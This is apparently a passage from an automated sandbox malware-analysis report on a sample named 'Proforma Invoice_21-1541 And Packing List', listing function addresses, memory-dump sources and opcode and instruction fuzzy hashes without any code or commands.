                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0de9efe3a9ed4c0662a6a799054aeab397215eb91a3d20fc9b01c3adc6fe435
                                                                                            • Instruction ID: 19e896697858161f8d11b14ede418fd789415e0db7e41560496eac3ea122c084
                                                                                            • Opcode Fuzzy Hash: c0de9efe3a9ed4c0662a6a799054aeab397215eb91a3d20fc9b01c3adc6fe435
                                                                                            • Instruction Fuzzy Hash: EE51B571E00214DFCB18DFAAD990ADEBBF6FF84300F558525E505B72A0EB70A986CB50
                                                                                            Function 0B04138F Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e27f2ec7b058ada62af1b614262b85d20b5e838ab4ce5967108b73a284c0fc53
                                                                                            • Instruction ID: 08f76a1bbbb7d09323c76042fb67575015a2205e7549ebc283056138464fa623
                                                                                            • Opcode Fuzzy Hash: e27f2ec7b058ada62af1b614262b85d20b5e838ab4ce5967108b73a284c0fc53
                                                                                            • Instruction Fuzzy Hash: A551A571E00614DFCB18DFAAC990ADDBBF2FF85300F558565E405B72A4EB70A986CB50
                                                                                            Function 0B040B99 Relevance: .1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b457efa2410a23d3f55e2dfc1a1963f4e948abd67014767077e714056fd0466
                                                                                            • Instruction ID: 05746ff08795f148eead70dda1c5bbe3cdc5b1aa14a85e581a657877299fb63c
                                                                                            • Opcode Fuzzy Hash: 1b457efa2410a23d3f55e2dfc1a1963f4e948abd67014767077e714056fd0466
                                                                                            • Instruction Fuzzy Hash: AC3125B1C1921ACFCB24CF60D8846ECBBB6BF8A341F0052A6D51AB6110EB705AC1CF50
                                                                                            Function 009FD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1768995017.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0193a96f388592173f2ec0ef304f894ae0fef7fb7817df19612330579cfff041
                                                                                            • Instruction ID: 34205300065a2a1a1ae4acb017c5f719685a29f154f39ba631459ad80dc0d3ee
                                                                                            • Opcode Fuzzy Hash: 0193a96f388592173f2ec0ef304f894ae0fef7fb7817df19612330579cfff041
                                                                                            • Instruction Fuzzy Hash: 5F213A71501208DFDB05DF14D9C4B36BF6AFB94324F20C569DA094B2A6C33AE856C7A2
                                                                                            Function 009FD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1768995017.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3bd793730dae09f5d9d39dd5da2a819b3b2fcc5efb108a67dfe723d4612f67f3
                                                                                            • Instruction ID: 83a322964182aa28feb71c0cc1eb1d71b14da83057a1ae82bbe4529073f8b970
                                                                                            • Opcode Fuzzy Hash: 3bd793730dae09f5d9d39dd5da2a819b3b2fcc5efb108a67dfe723d4612f67f3
                                                                                            • Instruction Fuzzy Hash: 08213771504248DFDB05DF14D9C0B3BBF66FB98318F20C569EA090B25AC33AD856DBA2
                                                                                            Function 00A0D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769046574.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a0d000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d9c8c6868854d2339d7aff8238870083d4115294cdd5bafc629f0e7fcc1747b3
                                                                                            • Instruction ID: 7b796d719e07c6246e563e06aee805409ed654d0a0b7319fb3b7afefe82fe8ae
                                                                                            • Opcode Fuzzy Hash: d9c8c6868854d2339d7aff8238870083d4115294cdd5bafc629f0e7fcc1747b3
                                                                                            • Instruction Fuzzy Hash: FC210472504208EFDB05DF94E9C0B66BBA5FB88314F20C66DE8094B296C336D846CA61
                                                                                            Function 00A0D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769046574.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a0d000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c2e9a249b27cce4d63a1f4464fd6e7168a81799ef62bdec5fef08a233c6ea78
                                                                                            • Instruction ID: 93fb4f283dee840b337c50c4c9e690e6bf98c8133b405ce3d71f31c8c6a0c37f
                                                                                            • Opcode Fuzzy Hash: 7c2e9a249b27cce4d63a1f4464fd6e7168a81799ef62bdec5fef08a233c6ea78
                                                                                            • Instruction Fuzzy Hash: B821F272604208EFDB14DF54E984B26BFA5FB84314F20C569D84E4B296C33AD847CA61
                                                                                            Function 0B0401A2 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d66a30e3ff2fab3b738e1fdc404774bf4dca0576f3281afc85bd1fc63fa0c92f
                                                                                            • Instruction ID: adcb3913f5874ae8987e19daceec24e2821d7c6bea7027907a9cfb6431636721
                                                                                            • Opcode Fuzzy Hash: d66a30e3ff2fab3b738e1fdc404774bf4dca0576f3281afc85bd1fc63fa0c92f
                                                                                            • Instruction Fuzzy Hash: 5131E7B5909218CFDB68CF64D880BECBBB5BB49301F1491EAD509B7251EB345A85CF50
                                                                                            Function 00A0D006 Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769046574.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a0d000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3772ca5fa30dbdf16049056414a17902eaabe77c7a20551a5a4e11924bf25be2
                                                                                            • Instruction ID: c63003ccbc24b95458d0cfdfee208dd74ad38dfd1a95a87433ecc9020c0e3792
                                                                                            • Opcode Fuzzy Hash: 3772ca5fa30dbdf16049056414a17902eaabe77c7a20551a5a4e11924bf25be2
                                                                                            • Instruction Fuzzy Hash: 9621A1765093848FCB02CF24D994715BF71EB46314F28C5DAD8498B6A7C33A980ACB62
                                                                                            Function 0B04046A Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dbcf604431b8b4c7df4b85e6281d8e83b040b413412d2e80178ee291a62eab12
                                                                                            • Instruction ID: a2f4312f2e0e08be73b16306ba04efe4f42d4edbac5361cbff27dfd60e0b836e
                                                                                            • Opcode Fuzzy Hash: dbcf604431b8b4c7df4b85e6281d8e83b040b413412d2e80178ee291a62eab12
                                                                                            • Instruction Fuzzy Hash: 622129B4809228CFCB68CF54D8047ECB7B5EB4A311F0494EAC61DB22A1E7348AC5CF40
                                                                                            Function 0B040122 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81f4abb4facc67974d22f218bf038efe1ed72b4802ee65fe5b5b9ea71e62cbd2
                                                                                            • Instruction ID: be87de6b636daab9d14a5782e6bdbc42ee2d68af97506991a58e321c429b3f0e
                                                                                            • Opcode Fuzzy Hash: 81f4abb4facc67974d22f218bf038efe1ed72b4802ee65fe5b5b9ea71e62cbd2
                                                                                            • Instruction Fuzzy Hash: 23211AB5908228DFDBA4DF54CC80BDCBBB5AB49700F1080E6D649A7291DB749AC1CF40
                                                                                            Function 009FD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1768995017.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: b38dbc54f26123447e69e2737cb0b4992cb26f232b7b02fe039b4f56c4bfe843
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: 9E112672404244CFDB02CF00D5C4B26BF72FB94324F24C2A9DD090B666C33AE85ACBA2
                                                                                            Function 009FD4BF Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1768995017.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: b089c2f696c9c23d1f62d40be746dcabf87776639ea611b44e0b5435e9bc4ba4
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: 60110672404244CFCB01CF10D5C4B26BF72FB94318F24C5A9E9050B25AC336D45ACB91
                                                                                            Function 0B04064C Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f7f82d747acff28712b67aa7a2403e26ce3ebb2d56187091a0bf0979f2d4a9e
                                                                                            • Instruction ID: 58d102f6d3cb32f70b55be2004bfdc57d92b1039e9d0932565c7c6b6767a32b3
                                                                                            • Opcode Fuzzy Hash: 3f7f82d747acff28712b67aa7a2403e26ce3ebb2d56187091a0bf0979f2d4a9e
                                                                                            • Instruction Fuzzy Hash: 3B21F5B4804269CFDB69CF54C9487ECBBF5AB09315F1481EAC50DB62A1EB348AC9CF40
                                                                                            Function 00A0D1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769046574.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a0d000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction ID: b6471e28803d09f6feb110c8383b47adc558274b7172f30b7fc6226815146d53
                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                            • Instruction Fuzzy Hash: F011BB76504284DFCB02CF54D5C4B55BBA1FB88314F24C6AAD8494B696C33AD80ACB61
                                                                                            Function 009FD745 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1768995017.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f952483bdbbcd8ec877eb2b695ad97b6b9e18778f9f753ecf9e3ae84123cf6a0
                                                                                            • Instruction ID: 32d677338345be99d3e8c95c4d66014acad5cdc77677fe090c5db7db51594daa
                                                                                            • Opcode Fuzzy Hash: f952483bdbbcd8ec877eb2b695ad97b6b9e18778f9f753ecf9e3ae84123cf6a0
                                                                                            • Instruction Fuzzy Hash: AE01F7B100A3489AE7106A29CD84B77BF9DDF41324F18C92AEE094E296C2399C40C771
                                                                                            Function 0B040305 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7b982e0a9ad8c4c87650d19e4db8c9ec1e3821331fa6e151195067d50d88b937
                                                                                            • Instruction ID: a02450a987c03d4afafcd6de4d908768a47bb30d3ce2c84ce77fb079ac02a40d
                                                                                            • Opcode Fuzzy Hash: 7b982e0a9ad8c4c87650d19e4db8c9ec1e3821331fa6e151195067d50d88b937
                                                                                            • Instruction Fuzzy Hash: 3F11FE74D14228CFCBA4CFA4D884BEDBBF5EB49300F1080A9D459A6245EB319A86CF40
                                                                                            Function 0B0405E3 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7503e00e120875765f6b573011386fa9f57c4303f05e651a8f84743683767152
                                                                                            • Instruction ID: 0f3669e3a69a36b5430a8f1d6542e69168303535364d52fec513aa75675fc0bc
                                                                                            • Opcode Fuzzy Hash: 7503e00e120875765f6b573011386fa9f57c4303f05e651a8f84743683767152
                                                                                            • Instruction Fuzzy Hash: 4F111574915228CFCFA4CF64C9447EDBBF9EB4A301F1480A9D159B6245EB314A86CF40
                                                                                            Function 0B040254 Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d01982ce2d7c98663db9df733c144969ed47fbe9ec9482cfcb61d40a0c86b19a
                                                                                            • Instruction ID: b964c0c72c116db662f28b789a447982dfcffffbbeee44e8e6efc3363e5d1f98
                                                                                            • Opcode Fuzzy Hash: d01982ce2d7c98663db9df733c144969ed47fbe9ec9482cfcb61d40a0c86b19a
                                                                                            • Instruction Fuzzy Hash: 8101E5B5904218DFDB54CF65C840BEDBBF9EB5A300F1491E6D509AB252DB349A8ACF10
                                                                                            Function 0B0405F7 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c21b60f5c98bd9adb66dac441611d39238c1b894ed598ce02f1419a9a74f9eb
                                                                                            • Instruction ID: 6916117d003c9b60e3bdfc5618e9eddc4410922177b87f5b1021c166663bdd41
                                                                                            • Opcode Fuzzy Hash: 2c21b60f5c98bd9adb66dac441611d39238c1b894ed598ce02f1419a9a74f9eb
                                                                                            • Instruction Fuzzy Hash: C1011B74804259CFDB29CF50D9487ECBBF5AB49311F0481EAC51DA6291DB348E85CF00
                                                                                            Function 0B0405D0 Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 44c7e3c491e33370c8e6baca92ff37fdc3b329f95129968dd15734c797379dd3
                                                                                            • Instruction ID: 600902f62ce51b1dde88e0837f80b0db3c663bad1333a6043d50e1d245eee76b
                                                                                            • Opcode Fuzzy Hash: 44c7e3c491e33370c8e6baca92ff37fdc3b329f95129968dd15734c797379dd3
                                                                                            • Instruction Fuzzy Hash: 6A0116B4904218DFDB58CB64C940BEDB7B9AB59300F04D1A5950DB7242D7359A89CF50
                                                                                            Function 009FD744 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1768995017.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9fd000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5028ae973ed29718f7d3af58fe9437aadf973b7b55e3fc4b1edfb52f7f692f2d
                                                                                            • Instruction ID: 225aa7b5e88da81eda5af79e76b5ea3a13f167689f1fd5c434c9e4adebd8bdcb
                                                                                            • Opcode Fuzzy Hash: 5028ae973ed29718f7d3af58fe9437aadf973b7b55e3fc4b1edfb52f7f692f2d
                                                                                            • Instruction Fuzzy Hash: 1EF062714053449EE7109E1AC888B62FFACEF51734F18C45AEE084E296C2799C44CBB1
                                                                                            Function 0B04069B Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3a7e1fff7766909799d42bf16cc8a1815c5ea2940ad7fea684b41bbeaf22004d
                                                                                            • Instruction ID: 52f58c806ede1f07a5660f0e3aa54a07c361252026379b80e9b9d838dbdc09e6
                                                                                            • Opcode Fuzzy Hash: 3a7e1fff7766909799d42bf16cc8a1815c5ea2940ad7fea684b41bbeaf22004d
                                                                                            • Instruction Fuzzy Hash: 17F05874905218CFDB28CF24D940BECB7B5EB4A310F0481EA841DBB292E730DA86CF00
                                                                                            Function 0B040E91 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6642528f4f5648543028511e5ff71112a9b65864613f2bc5c823a33846d7bb23
                                                                                            • Instruction ID: 2869ad16aeebfc221312c2de84b574de24f089989e6949b08a34e90cc4e6efba
                                                                                            • Opcode Fuzzy Hash: 6642528f4f5648543028511e5ff71112a9b65864613f2bc5c823a33846d7bb23
                                                                                            • Instruction Fuzzy Hash: 8EE086B440E3D09FC71BDBB09A526A93F745F43210B1405DBE0446B1A2DB7A8B24D752
                                                                                            Function 0B040EF0 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9bca3dc3c40d4af09fcb5c237e63c2ac3dc7a2f813564dd0c74cc0d03d32b0cf
                                                                                            • Instruction ID: 9f8724dccc288d05dec144d5812f1d9334b83687d0baa9f53fcce062ddac7b1e
                                                                                            • Opcode Fuzzy Hash: 9bca3dc3c40d4af09fcb5c237e63c2ac3dc7a2f813564dd0c74cc0d03d32b0cf
                                                                                            • Instruction Fuzzy Hash: 1CE0174140E3E62EE713AB7818700EABF748D43014B1900D3C8C49B167E64588ADC3EA
                                                                                            Function 0B040832 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 579108f757d34d74630a9d31b7849653c8acf385949acc299ef967ef228608fb
                                                                                            • Instruction ID: 7337737a105624cfd54e2dba4ccd59d5e28b517d041827faa7d96b3956821d6b
                                                                                            • Opcode Fuzzy Hash: 579108f757d34d74630a9d31b7849653c8acf385949acc299ef967ef228608fb
                                                                                            • Instruction Fuzzy Hash: 64E0ED79A08318CFDF15CF90CC90BEDBBB5BB4D300F1481999648AB282D7355A41CF40
                                                                                            Function 0B0408C0 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c980b84f776f5e4b965fc77ff1c208f2a7bb58d4f06ebd0c9c43f8d8cf5ef3a
                                                                                            • Instruction ID: ea4f74fe5c4ddacff642c62aef783d51e934de32483a94160eb4f8ba024813f3
                                                                                            • Opcode Fuzzy Hash: 6c980b84f776f5e4b965fc77ff1c208f2a7bb58d4f06ebd0c9c43f8d8cf5ef3a
                                                                                            • Instruction Fuzzy Hash: A9E01275414214DFCB14CF24C8907DCBBB5AB46314F0482E9851D57392D7319E46CF40
                                                                                            Function 0B041D11 Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c725561959feeb12bbaa1d29e77d0dfd209219249f54156ede0df6d9da35a032
                                                                                            • Instruction ID: 768b1061ff67a620f8966b3e313718d0854346c7670cecdd0773035f7dc7257a
                                                                                            • Opcode Fuzzy Hash: c725561959feeb12bbaa1d29e77d0dfd209219249f54156ede0df6d9da35a032
                                                                                            • Instruction Fuzzy Hash: 53E012B955DF810AD3AD9B39A5213A6BED29F85204F0489BF909A83552E720151A8706
                                                                                            Function 0B040EA0 Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 34286700d1499b9cc28652b616d6c19fc7901c1694414fce612623fbad0debf3
                                                                                            • Instruction ID: 6f79a2ddd161412ec82c55040e13cbfbc0f224f3f6f3f8e1474c09088512b7bf
                                                                                            • Opcode Fuzzy Hash: 34286700d1499b9cc28652b616d6c19fc7901c1694414fce612623fbad0debf3
                                                                                            • Instruction Fuzzy Hash: 89D022B0402318DFC70CEBA4E00179D77BCEB01210F1000ACE40413210EF729E40DB80
                                                                                            Function 0B040597 Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 543c9e8ca44ee4cff6dce75f159dd378a0497f176ac9382ee23a3cd06d870b4c
                                                                                            • Instruction ID: c6635cc9f368cbe580f76b5b6a80e661bd7bc9a15927516322e988798aca6733
